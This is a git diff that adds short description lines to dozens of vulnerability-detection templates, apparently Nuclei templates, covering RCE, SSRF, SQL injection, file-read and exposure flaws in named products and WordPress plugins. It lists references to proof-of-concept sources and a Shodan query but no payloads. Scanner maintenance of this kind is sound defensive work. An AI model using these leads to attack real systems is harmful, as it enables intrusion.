a/http/vulnerabilities/other/alibaba-anyproxy-lfi.yaml b/http/vulnerabilities/other/alibaba-anyproxy-lfi.yaml index 8cd2bbe4a2..b7bc178d90 100644 --- a/http/vulnerabilities/other/alibaba-anyproxy-lfi.yaml +++ b/http/vulnerabilities/other/alibaba-anyproxy-lfi.yaml @@ -4,6 +4,7 @@ info: name: Alibaba Anyproxy fetchBody File - Path Traversal author: DhiyaneshDk severity: high + description: Alibaba Anyproxy is vulnerable to Path Traversal. reference: - https://github.com/alibaba/anyproxy/issues/391 - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Alibaba%20AnyProxy%20fetchBody%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md diff --git a/http/vulnerabilities/other/apache-druid-log4j.yaml b/http/vulnerabilities/other/apache-druid-log4j.yaml index 83da9ad879..0a1517a566 100644 --- a/http/vulnerabilities/other/apache-druid-log4j.yaml +++ b/http/vulnerabilities/other/apache-druid-log4j.yaml @@ -4,6 +4,7 @@ info: name: Apache Druid - Remote Code Execution (Apache Log4j) author: SleepingBag945 severity: critical + description: Apache Druid is vulnerable to RCE due to Log4j. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 diff --git a/http/vulnerabilities/other/cacti-weathermap-file-write.yaml b/http/vulnerabilities/other/cacti-weathermap-file-write.yaml index bd48a24875..f0a35d06f9 100644 --- a/http/vulnerabilities/other/cacti-weathermap-file-write.yaml +++ b/http/vulnerabilities/other/cacti-weathermap-file-write.yaml @@ -4,6 +4,7 @@ info: name: Cacti Weathermap File Write author: pikpikcu severity: medium + description: Cacti Weathermap (a plugin for Cacti, an open-source network monitoring and graphing tool) is vulnerable to file write. metadata: max-request: 2 tags: injection,cacti diff --git a/http/vulnerabilities/other/crawlab-lfi.yaml b/http/vulnerabilities/other/crawlab-lfi.yaml index 1c06ee552a..ebb637d93b 100644 --- a/http/vulnerabilities/other/crawlab-lfi.yaml +++ b/http/vulnerabilities/other/crawlab-lfi.yaml @@ -4,6 +4,7 @@ info: name: Crawlab - Arbitrary File Read author: pussycat0x severity: high + description: Crawlab is vulnerable to arbitrary file read. reference: - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Crawlab%20file%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md metadata: diff --git a/http/vulnerabilities/other/digital-ocean-ssrf.yaml b/http/vulnerabilities/other/digital-ocean-ssrf.yaml index 7238cfd68c..81d14a188b 100644 --- a/http/vulnerabilities/other/digital-ocean-ssrf.yaml +++ b/http/vulnerabilities/other/digital-ocean-ssrf.yaml @@ -4,6 +4,7 @@ info: name: Digital Ocean - Server-side request forgery (SSRF) author: DhiyaneshDk severity: critical + description: Digital Ocean instance is vulnerable to SSRF. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N cvss-score: 9.3 diff --git a/http/vulnerabilities/other/easyimage-downphp-lfi.yaml b/http/vulnerabilities/other/easyimage-downphp-lfi.yaml index 1d29355d93..2840fc60ee 100644 --- a/http/vulnerabilities/other/easyimage-downphp-lfi.yaml +++ b/http/vulnerabilities/other/easyimage-downphp-lfi.yaml @@ -4,6 +4,7 @@ info: name: EasyImage down.php - Arbitrary File Read author: DhiyaneshDk severity: high + description: down.php file in EasyImage is vulnerable to arbitrary file read. reference: - https://github.com/qingchenhh/qc_poc/blob/main/Goby/EasyImage_down.php_file_read.go metadata: diff --git a/http/vulnerabilities/other/gloo-unauth.yaml b/http/vulnerabilities/other/gloo-unauth.yaml index c94f1721c5..c6abdc23e3 100644 --- a/http/vulnerabilities/other/gloo-unauth.yaml +++ b/http/vulnerabilities/other/gloo-unauth.yaml @@ -4,6 +4,7 @@ info: name: Unauthenticated Gloo UI author: dhiyaneshDk severity: high + description: Gloo UI is exposed to external users. metadata: max-request: 1 tags: unauth,gloo diff --git a/http/vulnerabilities/other/hanta-rce.yaml b/http/vulnerabilities/other/hanta-rce.yaml index bc108068a7..81460b0f4a 100644 --- a/http/vulnerabilities/other/hanta-rce.yaml +++ b/http/vulnerabilities/other/hanta-rce.yaml @@ -4,6 +4,7 @@ info: name: Hanta Internet Behavior Management System - Remote Code Execution author: momika233 severity: high + description: Hanta Internet Behavior Management System is vulnerable to RCE. metadata: verified: true max-request: 1 diff --git a/http/vulnerabilities/other/hasura-graphql-ssrf.yaml b/http/vulnerabilities/other/hasura-graphql-ssrf.yaml index ca106902d2..b329e8ead6 100644 --- a/http/vulnerabilities/other/hasura-graphql-ssrf.yaml +++ b/http/vulnerabilities/other/hasura-graphql-ssrf.yaml @@ -1,9 +1,10 @@ id: hasura-graphql-ssrf info: - name: Hasura GraphQL Engine - SSRF Side Request Forgery + name: Hasura GraphQL Engine - Server Side Request Forgery author: princechaddha severity: high + description: Hasura GraphQL Engine is vulnerable to SSRF( Server Side Request Forgery ) reference: - https://cxsecurity.com/issue/WLB-2021040115 metadata: diff --git a/http/vulnerabilities/other/jfrog-unauth-build-exposed.yaml b/http/vulnerabilities/other/jfrog-unauth-build-exposed.yaml index 17a76e9215..2bd2b6ae7c 100644 --- a/http/vulnerabilities/other/jfrog-unauth-build-exposed.yaml +++ b/http/vulnerabilities/other/jfrog-unauth-build-exposed.yaml @@ -4,6 +4,7 @@ info: name: JFrog Unauthentication Builds author: dhiyaneshDK severity: medium + description: JFrog Builds are exposed to Unauthenticated users. reference: - https://github.com/jaeles-project/jaeles-signatures/blob/master/common/jfrog-unauth-build-exposed.yaml metadata: diff --git a/http/vulnerabilities/other/kiwitcms-json-rpc.yaml b/http/vulnerabilities/other/kiwitcms-json-rpc.yaml index 291e43c281..fd14559e6a 100644 --- a/http/vulnerabilities/other/kiwitcms-json-rpc.yaml +++ b/http/vulnerabilities/other/kiwitcms-json-rpc.yaml @@ -4,6 +4,7 @@ info: name: Kiwi TCMS Information Disclosure author: act1on3 severity: high + description: Internal info exposed in Kiwi TCMS. reference: - https://hackerone.com/reports/968402 - https://kiwitcms.org/blog/kiwi-tcms-team/2020/08/23/kiwi-tcms-86/ diff --git a/http/vulnerabilities/other/phpldapadmin-xss.yaml b/http/vulnerabilities/other/phpldapadmin-xss.yaml index 4b8ed0c528..4357be141a 100644 --- a/http/vulnerabilities/other/phpldapadmin-xss.yaml +++ b/http/vulnerabilities/other/phpldapadmin-xss.yaml @@ -4,6 +4,7 @@ info: name: PHP LDAP Admin < 1.2.5 - Cross-Site Scripting author: GodfatherOrwa,herry severity: medium + description: PHP LDAP Admin is vulnerable to XSS. reference: - https://twitter.com/GodfatherOrwa/status/1701392754251563477 metadata: diff --git a/http/vulnerabilities/other/pyspider-unauthorized-access.yaml b/http/vulnerabilities/other/pyspider-unauthorized-access.yaml index b853c8b89c..f3f681f86a 100644 --- a/http/vulnerabilities/other/pyspider-unauthorized-access.yaml +++ b/http/vulnerabilities/other/pyspider-unauthorized-access.yaml @@ -4,6 +4,7 @@ info: name: Pyspider Unauthorized Access author: ritikchaddha severity: high + description: Unauthorized Access exists in PySpider which is an open-source web crawling and web scraping framework written in Python. reference: - https://github.com/ianxtianxt/Pyspider-webui-poc metadata: diff --git a/http/vulnerabilities/other/qizhi-fortressaircraft-unauth.yaml b/http/vulnerabilities/other/qizhi-fortressaircraft-unauth.yaml index 351df1a39c..36365089b9 100644 --- a/http/vulnerabilities/other/qizhi-fortressaircraft-unauth.yaml +++ b/http/vulnerabilities/other/qizhi-fortressaircraft-unauth.yaml @@ -4,6 +4,7 @@ info: name: Qizhi Fortressaircraft Unauthorized Access author: ritikchaddha severity: high + description: Qizhi Fortressaircraft is vulnerable to Unauthorized Access. reference: - https://mp.weixin.qq.com/s/FjMRJfCqmXfwPzGYq5Vhkw metadata: diff --git a/http/vulnerabilities/other/resin-cnnvd-200705-315.yaml b/http/vulnerabilities/other/resin-cnnvd-200705-315.yaml index 92ad64ba28..92224cfc83 100644 --- a/http/vulnerabilities/other/resin-cnnvd-200705-315.yaml +++ b/http/vulnerabilities/other/resin-cnnvd-200705-315.yaml @@ -4,6 +4,7 @@ info: name: Caucho Resin Information Disclosure author: princechaddha severity: high + description: Sensitive info disclosed in Caucho Resin. reference: - http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200705-315 metadata: diff --git a/http/vulnerabilities/other/sangfor-cphp-rce.yaml b/http/vulnerabilities/other/sangfor-cphp-rce.yaml index f601a11cd8..dfb2e74b1f 100644 --- a/http/vulnerabilities/other/sangfor-cphp-rce.yaml +++ b/http/vulnerabilities/other/sangfor-cphp-rce.yaml @@ -4,6 +4,7 @@ info: name: Sangfor Log Center - Remote Command Execution author: DhiyaneshDk severity: critical + description: Sangfor Log Center is vulnerable to RCE. reference: - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E6%B7%B1%E4%BF%A1%E6%9C%8D%20%E6%97%A5%E5%BF%97%E4%B8%AD%E5%BF%83%20c.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md?plain=1 metadata: diff --git a/http/vulnerabilities/other/sitemap-sql-injection.yaml b/http/vulnerabilities/other/sitemap-sql-injection.yaml index 5ce42f7471..d85694fb83 100644 --- a/http/vulnerabilities/other/sitemap-sql-injection.yaml +++ b/http/vulnerabilities/other/sitemap-sql-injection.yaml @@ -4,6 +4,7 @@ info: name: Sitemap - SQL Injection author: Aravind,j4vaovo severity: high + description: Sitemap is vulnerable to SQL Injection. reference: https://twitter.com/GodfatherOrwa/status/1647406811216072705?t=fbn0Eu34euKdrn4fL8UqfQ&s=19 metadata: max-request: 2 diff --git a/http/vulnerabilities/other/spark-webui-unauth.yaml b/http/vulnerabilities/other/spark-webui-unauth.yaml index 31a45c9631..0883f79463 100644 --- a/http/vulnerabilities/other/spark-webui-unauth.yaml +++ b/http/vulnerabilities/other/spark-webui-unauth.yaml @@ -4,6 +4,7 @@ info: name: Unauthenticated Spark WebUI author: princechaddha severity: medium + description: Spark WebUI is exposed to external users without any authentication. reference: - https://github.com/vulhub/vulhub/tree/master/spark/unacc metadata: diff --git a/http/vulnerabilities/other/sslvpn-client-rce.yaml b/http/vulnerabilities/other/sslvpn-client-rce.yaml index 257f9e82d1..3039806bdf 100644 --- a/http/vulnerabilities/other/sslvpn-client-rce.yaml +++ b/http/vulnerabilities/other/sslvpn-client-rce.yaml @@ -4,6 +4,7 @@ info: name: SSL VPN Client - Remote Code Execution author: DhiyaneshDK severity: critical + description: SSL VPN Client is vulnerable to RCE. reference: - https://github.com/server2565543706/Poc/blob/master/POC/anquantongsha.py - https://github.com/Vme18000yuan/FreePOC/blob/master/poc/pocsuite/security_products_rce.py diff --git a/http/vulnerabilities/other/tamronos-user-creation.yaml b/http/vulnerabilities/other/tamronos-user-creation.yaml index 83a30f6e2c..cc02bca2f9 100644 --- a/http/vulnerabilities/other/tamronos-user-creation.yaml +++ b/http/vulnerabilities/other/tamronos-user-creation.yaml @@ -4,6 +4,7 @@ info: name: TamronOS IPTV - Arbitrary User Creation author: pussycat0x severity: high + description: Unathenticated attackers can create multiple users in TamronOS IPTV. reference: - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/TamronOS%20IPTV%E7%B3%BB%E7%BB%9F%20submit%20%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B7%E5%88%9B%E5%BB%BA%E6%BC%8F%E6%B4%9E.md metadata: diff --git a/http/vulnerabilities/other/tianqing-info-leak.yaml b/http/vulnerabilities/other/tianqing-info-leak.yaml index 1508e6ae44..9f650d1ec1 100644 --- a/http/vulnerabilities/other/tianqing-info-leak.yaml +++ b/http/vulnerabilities/other/tianqing-info-leak.yaml @@ -4,6 +4,7 @@ info: name: Tianqing Info Leak author: ritikchaddha severity: medium + description: Information exposed in Tianqing. reference: - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g metadata: diff --git a/http/vulnerabilities/other/webpagetest-ssrf.yaml b/http/vulnerabilities/other/webpagetest-ssrf.yaml index f13e466ac6..5249fec64e 100644 --- a/http/vulnerabilities/other/webpagetest-ssrf.yaml +++ b/http/vulnerabilities/other/webpagetest-ssrf.yaml @@ -4,6 +4,7 @@ info: name: Web Page Test - Server Side Request Forgery (SSRF) author: pdteam severity: high + description: Web Page Test is vulnerable to SSRF. reference: - https://thinkloveshare.com/hacking/preauth_remote_code_execution_web_page_test/ - https://github.com/WPO-Foundation/webpagetest diff --git a/http/vulnerabilities/other/yibao-sqli.yaml b/http/vulnerabilities/other/yibao-sqli.yaml index b25df2815f..c66e616671 100644 --- a/http/vulnerabilities/other/yibao-sqli.yaml +++ b/http/vulnerabilities/other/yibao-sqli.yaml @@ -4,6 +4,7 @@ info: name: Yibao OA System - SQL Injection author: DhiyaneshDK severity: high + description: Yibao OA System is vulnerable to SQL Injection. metadata: verified: true max-request: 1 diff --git a/http/vulnerabilities/qibocms-file-download.yaml b/http/vulnerabilities/qibocms-file-download.yaml index b38a6c1b0c..b0a4237595 100644 --- a/http/vulnerabilities/qibocms-file-download.yaml +++ b/http/vulnerabilities/qibocms-file-download.yaml @@ -4,6 +4,7 @@ info: name: Qibocms - Arbitrary File Download author: theabhinavgaur severity: high + description: Qibocms - Arbitrary File Download metadata: verified: true max-request: 1 diff --git a/http/vulnerabilities/seeyon/seeyon-oa-fastjson-rce.yaml b/http/vulnerabilities/seeyon/seeyon-oa-fastjson-rce.yaml index 6981370cd4..8b19c55df5 100755 --- a/http/vulnerabilities/seeyon/seeyon-oa-fastjson-rce.yaml +++ b/http/vulnerabilities/seeyon/seeyon-oa-fastjson-rce.yaml @@ -4,6 +4,7 @@ info: name: Seeyon OA Fastjson Remote Code Execution author: SleepingBag945 severity: critical + description: Seeyon OA Fastjson is vulnerable to RCE. reference: - https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/SeeyonController.java - https://github.com/hktalent/scan4all/blob/main/pocs_go/seeyon/SeeyonFastjson.go diff --git a/http/vulnerabilities/splash/splash-render-ssrf.yaml b/http/vulnerabilities/splash/splash-render-ssrf.yaml index 38e1c1a7b1..7b4c42f5b4 100644 --- a/http/vulnerabilities/splash/splash-render-ssrf.yaml +++ b/http/vulnerabilities/splash/splash-render-ssrf.yaml @@ -4,6 +4,7 @@ info: name: Splash Render - SSRF author: pwnhxl severity: high + description: Splash Render - Server-Side Request Forgery (SSRF) Vulnerability reference: - https://github.com/scrapinghub/splash - https://b1ngz.github.io/splash-ssrf-to-get-server-root-privilege/ diff --git a/http/vulnerabilities/spring/jolokia-logback-jndi-rce.yaml b/http/vulnerabilities/spring/jolokia-logback-jndi-rce.yaml index 83dbb25c09..1f85264f1d 100755 --- a/http/vulnerabilities/spring/jolokia-logback-jndi-rce.yaml +++ b/http/vulnerabilities/spring/jolokia-logback-jndi-rce.yaml @@ -4,6 +4,7 @@ info: name: Jolokia Logback JNDI - Remote Code Execution author: SleepingBag945 severity: high + description: Jolokia Logback is vulnerable to RCE. reference: - https://thinkloveshare.com/hacking/ssrf_to_rce_with_jolokia_and_mbeans/ - https://github.com/laluka/jolokia-exploitation-toolkit diff --git a/http/vulnerabilities/tongda/tongda-session-disclosure.yaml b/http/vulnerabilities/tongda/tongda-session-disclosure.yaml index 46a6c78cf0..369e7a0cf4 100644 --- a/http/vulnerabilities/tongda/tongda-session-disclosure.yaml +++ b/http/vulnerabilities/tongda/tongda-session-disclosure.yaml @@ -4,6 +4,7 @@ info: name: Tongda User Session Disclosure author: ritikchaddha severity: medium + description: Tongda User session exposed. reference: - https://mp.weixin.qq.com/s/llyGEBRo0t-C7xOLMDYfFQ metadata: diff --git a/http/vulnerabilities/vmware/vmware-cloud-xss.yaml b/http/vulnerabilities/vmware/vmware-cloud-xss.yaml index 002790a60a..4144730409 100644 --- a/http/vulnerabilities/vmware/vmware-cloud-xss.yaml +++ b/http/vulnerabilities/vmware/vmware-cloud-xss.yaml @@ -4,6 +4,7 @@ info: name: VMWare Cloud - Cross Site Scripting author: tess severity: medium + description: VMWare Cloud is vulnerable to Reflected XSS. metadata: verified: true max-request: 1 diff --git a/http/vulnerabilities/weaver/weaver-jquery-file-upload.yaml b/http/vulnerabilities/weaver/weaver-jquery-file-upload.yaml index bf3736941e..ec579bfd46 100755 --- a/http/vulnerabilities/weaver/weaver-jquery-file-upload.yaml +++ b/http/vulnerabilities/weaver/weaver-jquery-file-upload.yaml @@ -4,6 +4,7 @@ info: name: OA E-Office jQuery - Arbitrary File Upload author: SleepingBag945 severity: critical + description: Arbitrary File Upload in OA E-Office jQuery. reference: - https://github.com/w-digital-scanner/w9scan/blob/master/plugins/weaver_oa/2158.py metadata: diff --git a/http/vulnerabilities/weaver/weaver-lazyuploadify-file-upload.yaml b/http/vulnerabilities/weaver/weaver-lazyuploadify-file-upload.yaml index 60cfd190b5..a3185c12f5 100755 --- a/http/vulnerabilities/weaver/weaver-lazyuploadify-file-upload.yaml +++ b/http/vulnerabilities/weaver/weaver-lazyuploadify-file-upload.yaml @@ -4,6 +4,7 @@ info: name: OA E-Office LazyUploadify - Arbitrary File Upload author: SleepingBag945 severity: critical + description: OA E-Office LazyUploadify is vulnerable to arbitrary file upload. reference: - https://github.com/w-digital-scanner/w9scan/blob/master/plugins/weaver_oa/2158.py metadata: diff --git a/http/vulnerabilities/weaver/weaver-login-sessionkey.yaml b/http/vulnerabilities/weaver/weaver-login-sessionkey.yaml index f751372602..f05e9acd6d 100644 --- a/http/vulnerabilities/weaver/weaver-login-sessionkey.yaml +++ b/http/vulnerabilities/weaver/weaver-login-sessionkey.yaml @@ -4,6 +4,7 @@ info: name: OA E-Mobile login_quick.php - Login SessionKey author: SleepingBag945 severity: high + description: login_quick.php in OA E-Mobile leaks session key. metadata: max-request: 2 shodan-query: http.html:"E-Mobile" diff --git a/http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml b/http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml index f4b9df2e23..5516999cc4 100755 --- a/http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml +++ b/http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml @@ -4,6 +4,7 @@ info: name: OA E-Office Uploadify - Arbitrary File Upload author: SleepingBag945 severity: critical + description: OA E-Office Uploadify is vulnerable to arbitrary file upload. reference: - https://github.com/w-digital-scanner/w9scan/blob/master/plugins/weaver_oa/2158.py metadata: diff --git a/http/vulnerabilities/wordpress/wordpress-affiliatewp-log.yaml b/http/vulnerabilities/wordpress/wordpress-affiliatewp-log.yaml index 198fea56a0..0c452fed55 100644 --- a/http/vulnerabilities/wordpress/wordpress-affiliatewp-log.yaml +++ b/http/vulnerabilities/wordpress/wordpress-affiliatewp-log.yaml @@ -4,6 +4,7 @@ info: name: WordPress Plugin "AffiliateWP -- Allowed Products" Log Disclosure author: dhiyaneshDK severity: low + description: Exposed debug log in AffiliateWP Wordpress Plugin metadata: max-request: 1 tags: wordpress,log,plugin diff --git a/http/vulnerabilities/wordpress/wordpress-db-backup-listing.yaml b/http/vulnerabilities/wordpress/wordpress-db-backup-listing.yaml index 29fc027047..61b2a06bb1 100644 --- a/http/vulnerabilities/wordpress/wordpress-db-backup-listing.yaml +++ b/http/vulnerabilities/wordpress/wordpress-db-backup-listing.yaml @@ -4,6 +4,7 @@ info: name: WordPress DB Backup author: Suman_Kar severity: medium + description: WordPress DB Backup plugin exposes db file along with directory listing. metadata: max-request: 1 tags: wordpress,backup diff --git a/http/vulnerabilities/wordpress/wordpress-db-backup.yaml b/http/vulnerabilities/wordpress/wordpress-db-backup.yaml index 6ff191493e..08d78d2203 100644 --- a/http/vulnerabilities/wordpress/wordpress-db-backup.yaml +++ b/http/vulnerabilities/wordpress/wordpress-db-backup.yaml @@ -4,6 +4,7 @@ info: name: WordPress DB Backup author: dwisiswant0 severity: medium + description: This template checks for exposed database in wordpress. metadata: max-request: 1 tags: wordpress,backups diff --git a/http/vulnerabilities/wordpress/wordpress-debug-log.yaml b/http/vulnerabilities/wordpress/wordpress-debug-log.yaml index 369d430451..023e5508d2 100644 --- a/http/vulnerabilities/wordpress/wordpress-debug-log.yaml +++ b/http/vulnerabilities/wordpress/wordpress-debug-log.yaml @@ -4,6 +4,7 @@ info: name: WordPress Debug Log - Exposure author: geraldino2,dwisiswant0,philippedelteil severity: low + description: Exposed Wordpress debug log. metadata: max-request: 4 tags: wp,wordpress,log,exposure diff --git a/http/vulnerabilities/wordpress/wordpress-directory-listing.yaml b/http/vulnerabilities/wordpress/wordpress-directory-listing.yaml index e29652a4c2..700df6cf04 100644 --- a/http/vulnerabilities/wordpress/wordpress-directory-listing.yaml +++ b/http/vulnerabilities/wordpress/wordpress-directory-listing.yaml @@ -4,6 +4,7 @@ info: name: Wordpress directory listing author: Manas_Harsh severity: info + description: Directory listing enabled in wordpress. metadata: max-request: 4 tags: wordpress diff --git a/http/vulnerabilities/wordpress/wordpress-emergency-script.yaml b/http/vulnerabilities/wordpress/wordpress-emergency-script.yaml index 4a91d84f3f..4712650a42 100644 --- a/http/vulnerabilities/wordpress/wordpress-emergency-script.yaml +++ b/http/vulnerabilities/wordpress/wordpress-emergency-script.yaml @@ -4,6 +4,7 @@ info: name: WordPress Emergency Script author: dwisiswant0 severity: info + description: Exposed wordpress password reset emergency script. reference: - https://wordpress.org/support/article/resetting-your-password/#using-the-emergency-password-reset-script metadata: diff --git a/http/vulnerabilities/wordpress/wordpress-installer-log.yaml b/http/vulnerabilities/wordpress/wordpress-installer-log.yaml index c439cb1149..cce3a51cd6 100644 --- a/http/vulnerabilities/wordpress/wordpress-installer-log.yaml +++ b/http/vulnerabilities/wordpress/wordpress-installer-log.yaml @@ -4,6 +4,7 @@ info: name: WordPress Installer Log author: dwisiswant0 severity: info + description: This file is generated during the installation process of wordpress and is exposed. metadata: max-request: 1 tags: wordpress,log diff --git a/http/vulnerabilities/wordpress/wordpress-rdf-user-enum.yaml b/http/vulnerabilities/wordpress/wordpress-rdf-user-enum.yaml index f0d4d6061f..ca993a7a40 100644 --- a/http/vulnerabilities/wordpress/wordpress-rdf-user-enum.yaml +++ b/http/vulnerabilities/wordpress/wordpress-rdf-user-enum.yaml @@ -4,6 +4,7 @@ info: name: Wordpress RDF User Enumeration author: r3dg33k severity: info + description: Leaked Wordpress RDF leads to User Emumeration. metadata: max-request: 1 tags: wordpress,enum diff --git a/http/vulnerabilities/wordpress/wordpress-ssrf-oembed.yaml b/http/vulnerabilities/wordpress/wordpress-ssrf-oembed.yaml index d52d59eda9..b7915ffc12 100644 --- a/http/vulnerabilities/wordpress/wordpress-ssrf-oembed.yaml +++ b/http/vulnerabilities/wordpress/wordpress-ssrf-oembed.yaml @@ -4,6 +4,7 @@ info: name: Wordpress Oembed Proxy - Server-side request forgery author: dhiyaneshDk severity: medium + description: The oEmbed feature in WordPress allows embedding content from external sources, and if it's not properly secured, it could be exploited for SSRF. reference: - https://book.hacktricks.xyz/pentesting/pentesting-web/wordpress - https://github.com/incogbyte/quickpress/blob/master/core/req.go diff --git a/http/vulnerabilities/wordpress/wordpress-total-upkeep-backup-download.yaml b/http/vulnerabilities/wordpress/wordpress-total-upkeep-backup-download.yaml index a87b8fda8d..60b4b4ed18 100644 --- a/http/vulnerabilities/wordpress/wordpress-total-upkeep-backup-download.yaml +++ b/http/vulnerabilities/wordpress/wordpress-total-upkeep-backup-download.yaml @@ -4,6 +4,7 @@ info: name: WordPress Total Upkeep Database and Files Backup Download author: princechaddha severity: high + description: Exposed sensitive file in WordPress Total Upkeep wordpress plugin feature used. reference: - https://www.exploit-db.com/exploits/49252 metadata: diff --git a/http/vulnerabilities/wordpress/wordpress-updraftplus-pem-key.yaml b/http/vulnerabilities/wordpress/wordpress-updraftplus-pem-key.yaml index fdc0197b59..040c992c98 100644 --- a/http/vulnerabilities/wordpress/wordpress-updraftplus-pem-key.yaml +++ b/http/vulnerabilities/wordpress/wordpress-updraftplus-pem-key.yaml @@ -4,6 +4,7 @@ info: name: UpdraftPlus Plugin Pem Key author: dhiyaneshDk severity: info + description: UpdraftPlus wordpress plugin private key leaked with directory listing. reference: - https://www.exploit-db.com/ghdb/6437 metadata: diff --git a/http/vulnerabilities/wordpress/wordpress-user-enum.yaml b/http/vulnerabilities/wordpress/wordpress-user-enum.yaml index 1cd64aba82..c1dae2f474 100644 --- a/http/vulnerabilities/wordpress/wordpress-user-enum.yaml +++ b/http/vulnerabilities/wordpress/wordpress-user-enum.yaml @@ -4,6 +4,7 @@ info: name: Wordpress User Enumeration author: r3dg33k severity: info + description: This template detects user enumeration in wordpress. metadata: max-request: 1 tags: wordpress diff --git a/http/vulnerabilities/wordpress/wp-config-setup.yaml b/http/vulnerabilities/wordpress/wp-config-setup.yaml index 3ef91520f3..3e48a36b3b 100644 --- a/http/vulnerabilities/wordpress/wp-config-setup.yaml +++ b/http/vulnerabilities/wordpress/wp-config-setup.yaml @@ -4,6 +4,7 @@ info: name: WordPress Setup Configuration author: princechaddha severity: high + description: Exposed Wordpress Setup Configuration. reference: - https://smaranchand.com.np/2020/04/misconfigured-wordpress-takeover-to-remote-code-execution/ metadata: diff --git a/http/vulnerabilities/wordpress/wp-full-path-disclosure.yaml b/http/vulnerabilities/wordpress/wp-full-path-disclosure.yaml index 24ce07f4e7..fd232ae0cd 100644 --- a/http/vulnerabilities/wordpress/wp-full-path-disclosure.yaml +++ b/http/vulnerabilities/wordpress/wp-full-path-disclosure.yaml @@ -4,6 +4,7 @@ info: name: Wordpress - Path Disclosure author: arcc severity: info + description: Wordpress internal file system path of a WordPress installation is exposed or disclosed to unauthorized users. reference: - https://make.wordpress.org/core/handbook/testing/reporting-security-vulnerabilities/#why-are-there-path-disclosures-when-directly-loading-certain-files - https://core.trac.wordpress.org/ticket/38317 diff --git a/http/vulnerabilities/wordpress/wp-haberadam-idor.yaml b/http/vulnerabilities/wordpress/wp-haberadam-idor.yaml index 7832b14743..811a784c0e 100644 --- a/http/vulnerabilities/wordpress/wp-haberadam-idor.yaml +++ b/http/vulnerabilities/wordpress/wp-haberadam-idor.yaml @@ -4,6 +4,7 @@ info: name: WordPress Themes Haberadam JSON API - IDOR and Path Disclosure author: pussycat0x severity: low + description: This template is designed to detect a misconfiguration vulnerability in WordPress themes that use the Haberadam JSON API. This vulnerability can lead to an Insecure Direct Object Reference (IDOR) and path disclosure, potentially exposing sensitive information. reference: - https://cxsecurity.com/issue/WLB-2021090078 metadata: diff --git a/http/vulnerabilities/wordpress/wp-license-file.yaml b/http/vulnerabilities/wordpress/wp-license-file.yaml index 362154a5b6..e502823483 100644 --- a/http/vulnerabilities/wordpress/wp-license-file.yaml +++ b/http/vulnerabilities/wordpress/wp-license-file.yaml @@ -4,6 +4,7 @@ info: name: WordPress license file disclosure author: yashgoti severity: info + description: Leaked WordPress license file. metadata: max-request: 1 tags: wordpress diff --git a/http/vulnerabilities/wordpress/wp-xmlrpc-pingback-detection.yaml b/http/vulnerabilities/wordpress/wp-xmlrpc-pingback-detection.yaml index af1364f6d4..0dddc65653 100644 --- a/http/vulnerabilities/wordpress/wp-xmlrpc-pingback-detection.yaml +++ b/http/vulnerabilities/wordpress/wp-xmlrpc-pingback-detection.yaml @@ -4,6 +4,7 @@ info: name: Wordpress XMLRPC Pingback detection author: pdteam severity: info + description: WordPress XML-RPC Pingback Detection refers to the identification and monitoring of XML-RPC Pingback functionality in a WordPress website. This is vulnerable to pingback detection and bruteforce attacks. reference: - https://github.com/dorkerdevil/rpckiller - https://the-bilal-rizwan.medium.com/wordpress-xmlrpc-php-common-vulnerabilites-how-to-exploit-them-d8d3c8600b32 diff --git a/http/vulnerabilities/wordpress/wpdm-cache-session.yaml b/http/vulnerabilities/wordpress/wpdm-cache-session.yaml index 57c1de0005..fd1256d248 100644 --- a/http/vulnerabilities/wordpress/wpdm-cache-session.yaml +++ b/http/vulnerabilities/wordpress/wpdm-cache-session.yaml @@ -4,6 +4,7 @@ info: name: Wpdm-Cache Session author: dhiyaneshDk severity: medium + description: Leaked session of Wpdm Cache wordpress plugin. reference: - https://www.exploit-db.com/ghdb/7004 metadata: diff --git a/http/vulnerabilities/wordpress/wpmudev-pub-keys.yaml b/http/vulnerabilities/wordpress/wpmudev-pub-keys.yaml index 355b8c3bf3..62d4f2a96f 100644 --- a/http/vulnerabilities/wordpress/wpmudev-pub-keys.yaml +++ b/http/vulnerabilities/wordpress/wpmudev-pub-keys.yaml @@ -4,6 +4,7 @@ info: name: Wpmudev Dashboard Pub Key author: dhiyaneshDk severity: medium + description: Wpmudev Wordpress Plugin public key leaked. reference: - https://www.exploit-db.com/ghdb/6443 metadata: diff --git a/http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml b/http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml index c27e6ae7f7..35c5bd967e 100644 --- a/http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml +++ b/http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml @@ -4,6 +4,7 @@ info: name: ZzzCMS 1.75 - Server-Side Request Forgery author: ritikchaddha severity: high + description: ZzzCMS (A Lightweight ASP.NET content management system) is vulnerable to SSRF(Server-Side Request Forgery). reference: - https://www.hacking8.com/bug-web/Zzzcms/Zzzcms-1.75-ssrf.html metadata: diff --git 